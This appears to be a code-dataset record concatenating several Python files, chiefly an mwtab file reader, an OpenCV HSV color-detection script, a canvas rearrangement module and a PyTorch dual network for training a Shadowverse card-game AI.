raise TypeError("Unknown file source.")
def _generate_handles(filenames):
"""Open a sequence of filenames one at time producing file objects.
The file is closed immediately when proceeding to the next iteration.
:param generator filenames: Generator object that yields the path to each file, one at a time.
:return: Filehandle to be processed into an instance.
"""
for fname in filenames:
path = GenericFilePath(fname)
for filehandle, source in path.open():
yield filehandle, source
filehandle.close()
def read_files(*sources, **kwds):
"""Construct a generator that yields file instances.
:param sources: One or more strings representing path to file(s).
"""
filenames = _generate_filenames(sources)
filehandles = _generate_handles(filenames)
for fh, source in filehandles:
try:
f = mwtab.MWTabFile(source)
f.read(fh)
if kwds.get('validate'):
validator.validate_file(mwtabfile=f,
section_schema_mapping=mwschema.section_schema_mapping)
if VERBOSE:
print("Processed file: {}".format(os.path.abspath(source)))
yield f
except Exception as e:
if VERBOSE:
print("Error processing file: ", os.path.abspath(source), "\nReason:", e)
raise e
def read_mwrest(*sources, **kwds):
"""Construct a generator that yields file instances.
:param sources: One or more strings representing path to file(s).
"""
filenames = _generate_filenames(sources)
filehandles = _generate_handles(filenames)
for fh, source in filehandles:
try:
f = mwrest.MWRESTFile(source)
f.read(fh)
if VERBOSE:
print("Processed url: {}".format(source))
yield f
except Exception as e:
if VERBOSE:
print("Error processing url: ", source, "\nReason:", e)
pass
class GenericFilePath(object):
"""`GenericFilePath` class knows how to open local files or files over URL."""
def __init__(self, path):
"""Initialize path.
:param str path: String representing a path to local file(s) or valid URL address of file(s).
"""
self.path = path
def open(self):
"""Generator that opens and yields filehandles using appropriate facilities:
test if path represents a local file or file over URL, if file is compressed
or not.
:return: Filehandle to be processed into an instance.
"""
is_url = self.is_url(self.path)
compression_type = self.is_compressed(self.path)
if not compression_type:
if is_url:
filehandle = urlopen(self.path)
else:
filehandle = open(self.path, "r", encoding="utf-8")
source = self.path
yield filehandle, source
filehandle.close()
elif compression_type:
if is_url:
response = urlopen(self.path)
path = response.read()
response.close()
else:
path = self.path
if compression_type == "zip":
ziparchive = zipfile.ZipFile(io.BytesIO(path), "r") if is_url else zipfile.ZipFile(path)
for name in ziparchive.infolist():
if not name.filename.endswith("/"):
filehandle = ziparchive.open(name)
source = self.path + "/" + name.filename
yield filehandle, source
filehandle.close()
elif compression_type in ("tar", "tar.bz2", "tar.gz"):
tararchive = tarfile.open(fileobj=io.BytesIO(path)) if is_url else tarfile.open(path)
for name in tararchive:
if name.isfile():
filehandle = tararchive.extractfile(name)
source = self.path + "/" + name.name
yield filehandle, source
filehandle.close()
elif compression_type == "bz2":
filehandle = bz2.BZ2File(io.BytesIO(path)) if is_url else bz2.BZ2File(path)
source = self.path
yield filehandle, source
filehandle.close()
elif compression_type == "gz":
filehandle = gzip.open(io.BytesIO(path)) if is_url else gzip.open(path)
source = self.path
yield filehandle, source
filehandle.close()
@staticmethod
def is_compressed(path):
"""Test if path represents compressed file(s).
:param str path: Path to file(s).
:return: String specifying compression type if compressed, "" otherwise.
:rtype: :py:class:`str`
"""
if path.endswith(".zip"):
return "zip"
elif path.endswith(".tar.gz"):
return "tar.gz"
elif path.endswith(".tar.bz2"):
return "tar.bz2"
elif path.endswith(".gz"):
return "gz"
elif path.endswith(".bz2"):
return "bz2"
elif path.endswith(".tar"):
return "tar"
return ""
@staticmethod
def is_url(path):
"""Test if path represents a valid URL.
:param str path: Path to file.
:return: True if path is valid url string, False otherwise.
:rtype: :py:obj:`True` or :py:obj:`False`
"""
try:
parse_result = urlparse(path)
return all((parse_result.scheme, parse_result.netloc, parse_result.path))
except ValueError:
return False
| 0 | 0 | 0 |
aa69cf9bb36a467022c07fe2ac1ca628a579afb9 | 1,897 | py | Python | 7-Color Detecting.py | macerman/Open-CV | 8a2bc35ba2610186fe2a38006b2ebbb3efbce31e | [
"MIT"
] | 1 | 2021-10-03T15:39:12.000Z | 2021-10-03T15:39:12.000Z | 7-Color Detecting.py | macerman/Open-CV | 8a2bc35ba2610186fe2a38006b2ebbb3efbce31e | [
"MIT"
] | null | null | null | 7-Color Detecting.py | macerman/Open-CV | 8a2bc35ba2610186fe2a38006b2ebbb3efbce31e | [
"MIT"
] | null | null | null | #--COLOR DETECTION--#
import cv2
import numpy as np
#our function for trackbars
path = "sources/lambo2.png"
#Burada renklerimizi ayarlayabilmek için bir trackbar hazırlayacağız
cv2.namedWindow("Trackbars") #making our window that our trackbars gon' be in
cv2.resizeWindow("Trackbars",640,240) #resizing our trackbar window
#birinci değerleri rengimizi istediğimiz gibi saptadıktan sonraki değerlerimiz olarak vereceğiz
cv2.createTrackbar("Hue Min","Trackbars",0,179,empty) #making a trackbar in our window and giving it values
cv2.createTrackbar("Hue Max","Trackbars",19,179,empty)
cv2.createTrackbar("Sat Min","Trackbars",110,255,empty) #saturation
cv2.createTrackbar("Sat Max","Trackbars",240,255,empty)
cv2.createTrackbar("Val Min","Trackbars",153,255,empty) #value
cv2.createTrackbar("Val Max","Trackbars",255,255,empty)
#we need it to read the value live, hence the loop
while True:
img = cv2.imread(path)
imgHSV = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
h_min = cv2.getTrackbarPos("Hue Min","Trackbars") #read the value
h_max = cv2.getTrackbarPos("Hue Max", "Trackbars")
s_min = cv2.getTrackbarPos("Sat Min", "Trackbars")
s_max = cv2.getTrackbarPos("Sat Max", "Trackbars")
v_min = cv2.getTrackbarPos("Val Min", "Trackbars")
v_max = cv2.getTrackbarPos("Val Max", "Trackbars")
print(h_min,h_max,s_min,s_max,v_min,v_max)
lower = np.array([h_min,s_min,v_min]) #our filter arrays
upper = np.array([h_max,s_max,v_max])
mask = cv2.inRange(imgHSV,lower,upper) #making our filtered img
#now we can detect the orange color
imgResult = cv2.bitwise_and(img,img,mask=mask) # this will turn our black and white mask to an rgb img
cv2.imshow("Original", img)
cv2.imshow("HSV", imgHSV)
cv2.imshow("Masked", mask)
cv2.imshow("Result", imgResult)
cv2.waitKey(1) | 41.23913 | 108 | 0.714286 | #--COLOR DETECTION--#
import cv2
import numpy as np
#our function for trackbars
def empty(x):
pass
path = "sources/lambo2.png"
#Burada renklerimizi ayarlayabilmek için bir trackbar hazırlayacağız
cv2.namedWindow("Trackbars") #making our window that our trackbars gon' be in
cv2.resizeWindow("Trackbars",640,240) #resizing our trackbar window
#birinci değerleri rengimizi istediğimiz gibi saptadıktan sonraki değerlerimiz olarak vereceğiz
cv2.createTrackbar("Hue Min","Trackbars",0,179,empty) #making a trackbar in our window and giving it values
cv2.createTrackbar("Hue Max","Trackbars",19,179,empty)
cv2.createTrackbar("Sat Min","Trackbars",110,255,empty) #saturation
cv2.createTrackbar("Sat Max","Trackbars",240,255,empty)
cv2.createTrackbar("Val Min","Trackbars",153,255,empty) #value
cv2.createTrackbar("Val Max","Trackbars",255,255,empty)
#we need it to read the value live, hence the loop
while True:
img = cv2.imread(path)
imgHSV = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
h_min = cv2.getTrackbarPos("Hue Min","Trackbars") #read the value
h_max = cv2.getTrackbarPos("Hue Max", "Trackbars")
s_min = cv2.getTrackbarPos("Sat Min", "Trackbars")
s_max = cv2.getTrackbarPos("Sat Max", "Trackbars")
v_min = cv2.getTrackbarPos("Val Min", "Trackbars")
v_max = cv2.getTrackbarPos("Val Max", "Trackbars")
print(h_min,h_max,s_min,s_max,v_min,v_max)
lower = np.array([h_min,s_min,v_min]) #our filter arrays
upper = np.array([h_max,s_max,v_max])
mask = cv2.inRange(imgHSV,lower,upper) #making our filtered img
#now we can detect the orange color
imgResult = cv2.bitwise_and(img,img,mask=mask) # this will turn our black and white mask to an rgb img
cv2.imshow("Original", img)
cv2.imshow("HSV", imgHSV)
cv2.imshow("Masked", mask)
cv2.imshow("Result", imgResult)
cv2.waitKey(1) | 2 | 0 | 23 |
724a8012ca1002b7331d8c73f477e13ffdcfc4e3 | 947 | py | Python | modules/photons_canvas/points/rearrange.py | Djelibeybi/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 51 | 2020-07-03T08:34:48.000Z | 2022-03-16T10:56:08.000Z | modules/photons_canvas/points/rearrange.py | delfick/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 81 | 2020-07-03T08:13:59.000Z | 2022-03-31T23:02:54.000Z | modules/photons_canvas/points/rearrange.py | Djelibeybi/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 8 | 2020-07-24T23:48:20.000Z | 2021-05-24T17:20:16.000Z | from photons_canvas.points.canvas import Canvas
| 23.097561 | 85 | 0.599789 | from photons_canvas.points.canvas import Canvas
class Separate:
def rearrange(self, canvas):
user_x = 0
for part in canvas.parts:
yield part.clone(user_x=user_x)
user_x += part.width / 8
class Straight:
def rearrange(self, canvas):
user_x = 0
for part in sorted(
canvas.parts, key=lambda p: (p.real_part.user_x, p.device, p.part_number)
):
yield part.clone(user_x=user_x, user_y=0)
user_x += part.width / 8
class VerticalAlignment:
def rearrange(self, canvas):
for part in canvas.parts:
yield part.clone(user_y=0)
def rearrange(canvas, rearranger, keep_colors=False):
new = Canvas()
parts = []
for part in rearranger.rearrange(canvas):
if keep_colors:
parts.append((part, part.colors))
else:
parts.append(part)
new.add_parts(*parts)
return new
| 734 | -9 | 170 |
8bf92f9554a026c81421946868bc7e095ee1d032 | 31,097 | py | Python | Embedd_Network_model.py | AutumnCrocus/shadow_sim | 79ad13ff9bd7131c82f269af32a3970f3e4bf2ca | [
"MIT"
] | 6 | 2020-11-08T18:41:23.000Z | 2022-03-29T07:11:37.000Z | Embedd_Network_model.py | AutumnCrocus/shadow_sim | 79ad13ff9bd7131c82f269af32a3970f3e4bf2ca | [
"MIT"
] | 5 | 2020-08-09T11:32:59.000Z | 2022-03-12T00:21:44.000Z | Embedd_Network_model.py | AutumnCrocus/shadow_sim | 79ad13ff9bd7131c82f269af32a3970f3e4bf2ca | [
"MIT"
] | 1 | 2021-01-31T05:57:10.000Z | 2021-01-31T05:57:10.000Z | # -*- coding: utf-8 -*-
import torch
import os
from torch.multiprocessing import Pool, Process, set_start_method,cpu_count, RLock,freeze_support, Value, Array, Manager,cpu_count
#os.environ["OMP_NUM_THREADS"] = "4" if torch.cuda.is_available() else "6"
os.environ["PYTHONWARNINGS"] = 'ignore:semaphore_tracker:UserWarning'
import numpy as np
from tqdm import tqdm
import torch.nn as nn
import torch.nn.functional as F
# from preprocess import *
from preprocess import d2v_model, d2v_ini_weight
import sys
from collections import namedtuple
import copy
import random
from my_enum import *
import torch.optim as optim
#from pytorch_memlab import profile
import argparse
from torch.autograd import detect_anomaly
from Additional_module import *
# Transition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward'))
Dual_State_value = namedtuple('Value', ('state', 'action', 'before_state', 'detailed_action_code','reward'))
Detailed_State_data = namedtuple('Value', ('hand_ids', 'hand_card_costs', 'follower_card_ids',
'amulet_card_ids', 'follower_stats', 'follower_abilities', 'able_to_evo',
'life_data', 'pp_data','able_to_play','able_to_attack', 'able_to_creature_attack',
'deck_data'))
"""
input = {'values', 'hand_ids','follower_card_ids',
'amulet_card_ids', 'follower_abilities', 'able_to_evo'}
"""
#@profile
deck_id_2_name = {0: "Sword_Aggro", 1: "Rune_Earth", 2: "Sword", 3: "Shadow", 4: "Dragon_PDK", 5: "Haven",
6: "Blood", 7: "Dragon", 8: "Forest", 9: "Rune", 10: "DS_Rune", -1: "Forest_Basic", -2: "Sword_Basic",
-3: "Rune_Basic",
-4: "Dragon_Basic", -5: "FOREST_Basic", -6: "Blood_Basic", -7: "Haven_Basic", -8: "Portal_Basic",
100: "TEST",
-9: "Spell-Rune", 11: "PtP-Forest", 12: "Mid-Shadow", 13: "Neutral-Blood"}
key_2_tsv_name = {0: ["Sword_Aggro.tsv", "SWORD"], 1: ["Rune_Earth.tsv", "RUNE"], 2: ["Sword.tsv", "SWORD"],
3: ["New-Shadow.tsv", "SHADOW"], 4: ["Dragon_PDK.tsv", "DRAGON"], 5: ["Test-Haven.tsv", "HAVEN"],
6: ["Blood.tsv", "BLOOD"], 7: ["Dragon.tsv", "DRAGON"], 8: ["Forest.tsv", "FOREST"],
9: ["SpellBoost-Rune.tsv", "RUNE"], 10: ["Dimension_Shift_Rune.tsv", "RUNE"],
11: ["PtP_Forest.tsv", "FOREST"], 12: ["Mid_Shadow.tsv", "SHADOW"],
13: ["Neutral_Blood.tsv", "BLOOD"],100: ["TEST.tsv", "SHADOW"],
-2: ["Sword_Basic.tsv", "SWORD"]}
# +
# -
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='デュアルニューラルネットワーク学習コード')
parser.add_argument('--episode_num', help='試行回数')
parser.add_argument('--iteration_num', help='イテレーション数')
parser.add_argument('--epoch_num', help='エポック数')
parser.add_argument('--batch_size', help='バッチサイズ')
parser.add_argument('--mcts', help='サンプリングAIをMCTSにする(オリジナルの場合は[OM])')
parser.add_argument('--deck', help='サンプリングに用いるデッキの選び方')
parser.add_argument('--cuda', help='gpuを使用するかどうか')
parser.add_argument('--multi_train', help="学習時も並列化するかどうか")
parser.add_argument('--epoch_interval', help="モデルの保存間隔")
parser.add_argument('--fixed_deck_id', help="使用デッキidの固定")
parser.add_argument('--cpu_num', help="使用CPU数", default=2 if torch.cuda.is_available() else 3)
parser.add_argument('--batch_num', help='サンプルに対するバッチの数')
args = parser.parse_args()
deck_flg = int(args.fixed_deck_id) if args.fixed_deck_id is not None else None
args = parser.parse_args()
net = New_Dual_Net(100)
if torch.cuda.is_available() and args.cuda == "True":
net = net.cuda()
print("cuda is available.")
cuda_flg = args.cuda == "True"
from emulator_test import * # importの依存関係により必ず最初にimport
from Field_setting import *
from Player_setting import *
from Policy import *
from Game_setting import Game
#deck_sampling_type = False
#if args.deck is not None:
# deck_sampling_type = True
G = Game()
episode_len = 100
if args.episode_num is not None:
episode_len = int(args.episode_num)
batch_size = 100
if args.batch_size is not None:
batch_size = int(args.batch_size)
iteration = 10
if args.iteration_num is not None:
iteration = int(args.iteration_num)
epoch_num = 2
if args.epoch_num is not None:
epoch_num = int(args.epoch_num)
mcts = False
if args.mcts is not None:
mcts = True
import datetime
t1 = datetime.datetime.now()
print(t1)
#print(net)
R = New_Dual_ReplayMemory(100000)
net.zero_grad()
prev_net = copy.deepcopy(net)
import os
optimizer = optim.Adam(net.parameters(), weight_decay=0.01)
for epoch in range(epoch_num):
print("epoch {}".format(epoch+1))
R = New_Dual_ReplayMemory(100000)
p1 = Player(9, True, policy=New_Dual_NN_Non_Rollout_OM_ISMCTSPolicy(origin_model=net, cuda=cuda_flg))
p1.name = "Alice"
p2 = Player(9, False, policy=New_Dual_NN_Non_Rollout_OM_ISMCTSPolicy(origin_model=prev_net, cuda=cuda_flg))
p2.name = "Bob"
win_num = 0
for episode in tqdm(range(episode_len)):
f = Field(5)
deck_type1 = deck_flg
deck_type2 = deck_flg
if deck_flg is None:
deck_type1 = random.choice(list(key_2_tsv_name.keys()))
deck_type2 = random.choice(list(key_2_tsv_name.keys()))
d1 = tsv_to_deck(key_2_tsv_name[deck_type1][0])
d1.set_leader_class(key_2_tsv_name[deck_type1][1])
d2 = tsv_to_deck(key_2_tsv_name[deck_type2][0])
d2.set_leader_class(key_2_tsv_name[deck_type2][1])
d1.shuffle()
d2.shuffle()
p1.deck = d1
p2.deck = d2
f.players = [p1, p2]
p1.field = f
p2.field = f
#import cProfile
#cProfile.run("G.start_for_dual(f, virtual_flg=True, target_player_num=episode % 2)",sort="tottime")
#assert False
train_data, reward = G.start_for_dual(f, virtual_flg=True, target_player_num=episode % 2)
f.players[0].life = 20
f.players[0].hand.clear()
f.players[0].deck = None
f.players[0].lib_out_flg = False
f.players[1].life = 20
f.players[1].hand.clear()
f.players[1].deck = None
f.players[1].lib_out_flg = False
for i in range(2):
for data in train_data[i]:
R.push(data[0], data[1], data[2], data[3], reward[i])
win_num += int(reward[episode % 2] > 0)
print("sample_size:{}".format(len(R.memory)))
print("win_rate:{:.2%}".format(win_num/episode_len))
prev_net = copy.deepcopy(net)
sum_of_loss = 0
sum_of_MSE = 0
sum_of_CEE = 0
p,pai,z,states,loss = None, None, None, None,None
current_net, prev_optimizer = None, None
for i in tqdm(range(iteration)):
print("\ni:{}\n".format(i))
states, actions, rewards = R.sample(batch_size)
states['target'] = {'actions':actions, 'rewards':rewards}
p, v, loss = net(states,target=True)
z = rewards
pai = actions#45種類の抽象化した行動
if (i + 1) % 100== 0:
print("target:{} output:{}".format(z[0],v[0]))
print("target:{} output:{}".format(pai[0], p[0]))
print("loss:{}".format([loss[j].item() for j in range(3)]))
if torch.isnan(loss):
# section 3
net = current_net
optimizer = torch.optim.Adam(net.parameters())
optimizer.load_state_dict(prev_optimizer.state_dict())
else:
current_net = copy.deepcopy(net)
prev_optimizer = copy.deepcopy(optimizer)
optimizer.zero_grad()
loss[0].backward()
sum_of_loss += float(loss[0].item())
sum_of_MSE += float(loss[1].item())
sum_of_CEE += float(loss[2].item())
optimizer.step()
print("{}".format(epoch + 1))
print("AVE | Over_All_Loss: {:.3f} | MSE: {:.3f} | CEE:{:.3f}"\
.format(sum_of_loss/iteration,sum_of_MSE/iteration,sum_of_CEE/iteration))
if torch.isnan(loss[0]):
for key in list(net.state_dict().keys()):
print(key, net.state_dict()[key].size())
if len(net.state_dict()[key].size()) == 1:
print(torch.max(net.state_dict()[key], dim=0), "\n", torch.min(net.state_dict()[key], dim=0))
else:
print(torch.max(net.state_dict()[key], 0), "\n", torch.min(net.state_dict()[key], 0))
print("")
assert False
if epoch_num > 4 and (epoch+1) % (epoch_num//4) == 0 and epoch+1 < epoch_num:
PATH = "model/Dual_{}_{}_{}_{}_{}_{}_{:.0%}.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
t1.second, (epoch+1)/epoch_num)
if torch.cuda.is_available() and cuda_flg:
PATH = "model/Dual_{}_{}_{}_{}_{}_{}_{:.0%}_cuda.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
t1.second, (epoch + 1) / epoch_num)
torch.save(net.state_dict(), PATH)
print("{} is saved.".format(PATH))
print('Finished Training')
#PATH = './value_net.pth'
#PATH = './value_net.pth'
PATH = "model/Dual_{}_{}_{}_{}_{}_{}_all.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
t1.second)
if torch.cuda.is_available() and cuda_flg:
PATH = "model/Dual_{}_{}_{}_{}_{}_{}_all_cuda.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
t1.second)
torch.save(net.state_dict(), PATH)
print("{} is saved.".format(PATH))
t2 = datetime.datetime.now()
print(t2)
print(t2-t1)
| 47.045386 | 149 | 0.610123 | # -*- coding: utf-8 -*-
import torch
import os
from torch.multiprocessing import Pool, Process, set_start_method,cpu_count, RLock,freeze_support, Value, Array, Manager,cpu_count
#os.environ["OMP_NUM_THREADS"] = "4" if torch.cuda.is_available() else "6"
os.environ["PYTHONWARNINGS"] = 'ignore:semaphore_tracker:UserWarning'
import numpy as np
from tqdm import tqdm
import torch.nn as nn
import torch.nn.functional as F
# from preprocess import *
from preprocess import d2v_model, d2v_ini_weight
import sys
from collections import namedtuple
import copy
import random
from my_enum import *
import torch.optim as optim
#from pytorch_memlab import profile
import argparse
from torch.autograd import detect_anomaly
from Additional_module import *
# Transition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward'))
Dual_State_value = namedtuple('Value', ('state', 'action', 'before_state', 'detailed_action_code','reward'))
Detailed_State_data = namedtuple('Value', ('hand_ids', 'hand_card_costs', 'follower_card_ids',
'amulet_card_ids', 'follower_stats', 'follower_abilities', 'able_to_evo',
'life_data', 'pp_data','able_to_play','able_to_attack', 'able_to_creature_attack',
'deck_data'))
"""
input = {'values', 'hand_ids','follower_card_ids',
'amulet_card_ids', 'follower_abilities', 'able_to_evo'}
"""
class PositionalEncoding(nn.Module):
def __init__(self, d_model, dropout=0.1, max_len=5000):
super(PositionalEncoding, self).__init__()
self.dropout = nn.Dropout(p=dropout)
pe = torch.zeros(max_len, d_model)
position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)
div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-np.log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0).transpose(0, 1)
self.register_buffer('pe', pe)
def forward(self, x):
x = x + self.pe[:x.size(0), :]
return self.dropout(x)
class New_Dual_Net(nn.Module):
def __init__(self,n_mid,rand=False, hidden_num=6):
super(New_Dual_Net, self).__init__()
self.state_net =Simple_State_Net(n_mid,rand=rand,hidden_n=hidden_num)
#Dual_State_Net(n_mid,rand=rand)
self.emb1 = self.state_net.emb1#nn.Embedding(3000,n_mid,padding_idx=0)#1000枚*3カテゴリー(空白含む)
layer_num = 2#3
self.vec_size = self.state_net.vec_size
self.hiddden_size = 2 * self.vec_size + 5
layer = [Dual_ResNet(n_mid+self.hiddden_size,n_mid+self.hiddden_size) for _ in range(layer_num)]
self.layer = nn.ModuleList(layer)
self.layer_len = len(self.layer)
self.action_value_net = Action_Value_Net(self,mid_size=n_mid)
self.loss_fn = Dual_Loss()
self.filtered_softmax = filtered_softmax()
self.n_mid = n_mid
# self.mish = torch.sigmoid#Mish()
#self.direct_layer = nn.Linear(n_mid, n_mid)
self.preprocess_len = 5
preprocess_layer = [Dual_ResNet(n_mid,n_mid) for _ in range(self.preprocess_len)]
self.preprocess_layer = nn.ModuleList(preprocess_layer)
self.final_layer = nn.Linear(n_mid,1)
nn.init.kaiming_normal_(self.final_layer.weight)
#self.conv = nn.Conv1d(in_channels=100,out_channels=1,kernel_size=1)
self.relu = torch.tanh#torch.sigmoid()#nn.ReLU()
self.prelu = torch.tanh#torch.sigmoid()#nn.PReLU(init=0.01)
self.integrate_layer = nn.Linear(n_mid+self.hiddden_size,n_mid)
nn.init.kaiming_normal_(self.integrate_layer.weight)
self.rnn = nn.LSTM(input_size=n_mid,hidden_size=n_mid,batch_first=True,num_layers=3)
#nn.init.kaiming_normal_(self.rnn.weight)
#encoder_layers = nn.TransformerEncoderLayer(n_mid, 4 ,dropout=0.01)
#self.transformer_encoder = nn.TransformerEncoder(encoder_layers, 1)
ans = {'values': {'life_datas': None,
'class_datas': None,
'deck_type_datas': None,
'hand_card_costs': None,
'follower_stats': None,
'pp_datas': None,
'able_to_play': None,
'able_to_attack': None,
'able_to_creature_attack': None,
},
'hand_ids': None,
'follower_card_ids': None,
'amulet_card_ids': None,
'follower_abilities': None,
'able_to_evo': None,
'deck_datas': None,
'detailed_action_codes': {'action_categories': None,
'play_card_ids': None,
'field_card_ids': None,
'able_to_choice': None,
'action_choice_len':None},
'before_states':{'values': {'life_datas': None,
'class_datas': None,
'deck_type_datas': None,
'hand_card_costs': None,
'follower_stats': None,
'pp_datas': None,
'able_to_play': None,
'able_to_attack': None,
'able_to_creature_attack': None,
},
'hand_ids': None,
'follower_card_ids': None,
'amulet_card_ids': None,
'follower_abilities': None,
'able_to_evo': None,
'deck_datas': None}
}
self.states_keys = tuple(ans.keys())
self.normal_states_keys = tuple(set(self.states_keys) - {'values', 'detailed_action_codes', 'before_states'})
self.value_keys = tuple(ans['values'].keys())
self.action_code_keys = tuple(ans['detailed_action_codes'].keys())
self.cuda_flg = False
value_layer = [nn.Linear(n_mid,n_mid)for _ in range(3)]
for i in range(len(value_layer)):
nn.init.kaiming_normal_(value_layer[i].weight)
self.value_layer = nn.ModuleList(value_layer)
#@profile
def forward(self, states,target=False):
values = states['values']
detailed_action_codes = states['detailed_action_codes']
# action_categories = detailed_action_codes['action_categories']
# play_card_ids = detailed_action_codes['play_card_ids']
# field_card_ids = detailed_action_codes['field_card_ids']
able_to_choice = detailed_action_codes['able_to_choice']
action_choice_len = detailed_action_codes['action_choice_len']
current_states = self.state_net(states)
before_states = states["before_states"]
#print("size:",before_states.size())
split_states = before_states#torch.split(before_states,[1,1,1,1],dim=1)
try:
embed_action_categories = self.action_value_net.action_catgory_eye[split_states[0].long()].view(-1,4)
# print(before_states)
except KeyError as err:
print(before_states)
print(err)
sys.exit()
#.to(stats.device)#self.emb1(action_categories)(-1,45,4)
#embed_acting_card_ids = split_states[1]#self.action_value_net.emb2(split_states[1])
embed_acting_card_ids = self.emb1(split_states[1])
embed_acting_card_ids = self.action_value_net.prelu_3(embed_acting_card_ids)
#embed_acted_card_ids = split_states[2]#self.action_value_net.emb2(split_states[2])#(-1,45,n_mid,?)
embed_acted_card_ids = self.emb1(split_states[2])
#embed_acted_card_sides = split_states[3].view(-1,1)#self.action_value_net.side_emb(split_states[3]) # (-1,45,?,n_mid)
#print(split_states)
embed_acted_card_sides = self.action_value_net.side_emb(split_states[3]).view(-1,1)
input_tensors = [embed_action_categories,embed_acting_card_ids,
embed_acted_card_ids,embed_acted_card_sides]
#for cell in input_tensors:
# print(cell.size())
before_states = torch.cat(input_tensors,dim=1).view(-1,2*self.vec_size+5)
#before_states = self.state_net(states["before_states"])
current_states = current_states
x3 = torch.cat([current_states,before_states],dim=1)#current_states
for i in range(self.layer_len):
x3 = self.layer[i](x3)
# for i in range(self.layer_len):
# x = self.layer[i](x)
x=self.prelu(self.integrate_layer(x3))#+x3
tmp = self.action_value_net(x,detailed_action_codes,values,target=target)
h_p2 = tmp
out_p = self.filtered_softmax(h_p2, able_to_choice)
v_x = x
for i in range(self.preprocess_len):
v_x = self.preprocess_layer[i](v_x)
out_v = torch.tanh(self.final_layer(v_x))#+before_x)
if target:
z = states['target']['rewards']
pai = states['target']['actions']
return out_p, out_v, self.loss_fn(out_p, out_v, z, pai,action_choice_len)
else:
return out_p, out_v
def cuda(self):
self.state_net.cuda_all()
self.action_value_net.cuda_all()
print("model is formed to cuda")
self.cuda_flg = True
return super(New_Dual_Net, self).cuda()
def cpu(self):
self.state_net.cpu()
self.action_value_net.cpu()
print("model is formed to cpu")
self.cuda_flg = False
return super(New_Dual_Net, self).cpu()
class Dual_State_Net(nn.Module):
def __init__(self, n_mid,rand=False):
super(Dual_State_Net, self).__init__()
self.short_mid = n_mid//10
self.value_layer = nn.Linear(6+15+10+1+1+1,self.short_mid)#nn.Linear(5+15+n_mid,n_mid)
nn.init.kaiming_normal_(self.value_layer.weight)
self.life_layer = nn.Linear(5, self.short_mid)#nn.Linear(5, n_mid)
nn.init.kaiming_normal_(self.life_layer.weight)
self.hand_value_layer = nn.Linear(20, 10)#nn.Linear(10, 10)#nn.Linear(n_mid, n_mid)
nn.init.kaiming_normal_(self.hand_value_layer.weight)
self.hand_integrate_layer = nn.Linear(10, self.short_mid)#nn.Linear(n_mid, n_mid)
nn.init.kaiming_normal_(self.hand_integrate_layer.weight)
self.deck_value_layer = nn.Linear(20, 10)#nn.Linear(10, 10)#nn.Linear(n_mid, n_mid)
nn.init.kaiming_normal_(self.deck_value_layer.weight)
self.deck_integrate_layer = nn.Linear(10, self.short_mid)#nn.Linear(n_mid, n_mid)
nn.init.kaiming_normal_(self.deck_integrate_layer.weight)
self.amulet_value_layer = nn.Linear(10, self.short_mid)#nn.Linear(10, self.short_mid)#nn.Linear(n_mid, n_mid)
nn.init.kaiming_normal_(self.amulet_value_layer.weight)
self.field_value_layer = nn.Linear(20, 10)#nn.Linear(10, 10)#nn.Linear(n_mid, n_mid)
nn.init.kaiming_normal_(self.field_value_layer.weight)
if rand:
self.emb1 = nn.Embedding(2797, len(d2v_model.docvecs[0]), padding_idx=0)
nn.init.kaiming_normal_(self.emb1.weight)
else:
self.emb1 = nn.Embedding(2797,len(d2v_model.docvecs[0]),padding_idx=0)
self.emb1.weight = nn.Parameter(d2v_ini_weight)
self.concat_layer = nn.Linear(self.short_mid,self.short_mid)
nn.init.kaiming_normal_(self.concat_layer.weight)
#self.concat_layer = nn.Linear(n_mid+10*2+1+16+8,n_mid)
self.class_eye = torch.cat([torch.Tensor([[0] * 8]), torch.eye(8)], dim=0)
self.ability_eye = torch.cat([torch.Tensor([[0] * 15]), torch.eye(15)], dim=0)
self.deck_type_eye = torch.cat([torch.Tensor([[0] * 4]), torch.eye(4)], dim=0)
self.pos_encoder = PositionalEncoding(n_mid, dropout=0.1)
self.prelu_layer = Mish()#torch.tanh
hidden_layer_num = 10
origin = 94*self.short_mid
node_shrink_range = (origin - n_mid) // hidden_layer_num
self.modify_layer_num = hidden_layer_num
node_size_list = [origin - i * node_shrink_range for i in range(hidden_layer_num)] + [n_mid]
modify_layer = [nn.Linear(node_size_list[i], node_size_list[i+1]) for i in range(hidden_layer_num)]
self.modify_layer = nn.ModuleList(modify_layer)
self.n_mid = n_mid
# self.mish = torch.tanh
def cuda_all(self):
self.class_eye = self.class_eye.cuda()
self.ability_eye = self.ability_eye.cuda()
self.deck_type_eye = self.deck_type_eye.cuda()
return super(Dual_State_Net, self).cuda()
def cpu(self):
self.class_eye = self.class_eye.cpu()
self.ability_eye = self.ability_eye.cpu()
self.deck_type_eye = self.deck_type_eye.cpu()
return super(Dual_State_Net, self).cpu()
def init_weights(self):
initrange = 0.1
self.emb1.weight.data.uniform_(-initrange, initrange)
def forward(self, states):
values = states['values']
hand_ids = states['hand_ids']
follower_card_ids = states['follower_card_ids']
amulet_card_ids = states['amulet_card_ids']
follower_abilities = states['follower_abilities']
life_datas = values['life_datas']
class_datas = values['class_datas']
deck_type_datas = values['deck_type_datas']
stats = values['follower_stats']
deck_datas = states["deck_datas"]
able_to_attack = values["able_to_attack"].view(-1,10,1)
able_to_creature_attack = values["able_to_creature_attack"].view(-1,10,1)
able_to_evo = states["able_to_evo"].view(-1,10,1)
#class_values = self.class_eye[class_datas].view(-1,16).to(stats.device)
#deck_type_values = self.deck_type_eye[deck_type_datas].view(-1,8).to(stats.device)
class_values = self.class_eye[class_datas].view(-1, 16).unsqueeze(-1)#.to(stats.device)
